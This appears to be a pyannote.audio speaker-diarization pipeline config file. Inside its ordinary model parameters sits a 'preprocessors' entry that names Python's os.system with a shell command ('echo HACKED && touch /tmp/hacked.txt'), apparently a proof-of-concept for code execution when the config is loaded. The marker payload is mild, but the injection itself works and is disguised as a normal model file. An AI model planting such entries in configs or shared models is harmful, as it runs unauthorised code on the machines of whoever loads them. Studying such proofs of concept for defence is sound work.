File size: 553 Bytes
e858175 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | dependencies:
pyannote.audio: 4.0.0
pipeline:
name: pyannote.audio.pipelines.SpeakerDiarization
params:
clustering: VBxClustering
segmentation: $model/segmentation
segmentation_batch_size: 32
embedding: $model/embedding
embedding_batch_size: 32
embedding_exclude_overlap: true
plda: $model/plda
preprocessors:
key:
name: os.system
params:
command: "echo HACKED && touch /tmp/hacked.txt"
params:
clustering:
threshold: 0.6
Fa: 0.07
Fb: 0.8
segmentation:
min_duration_off: 0.0
|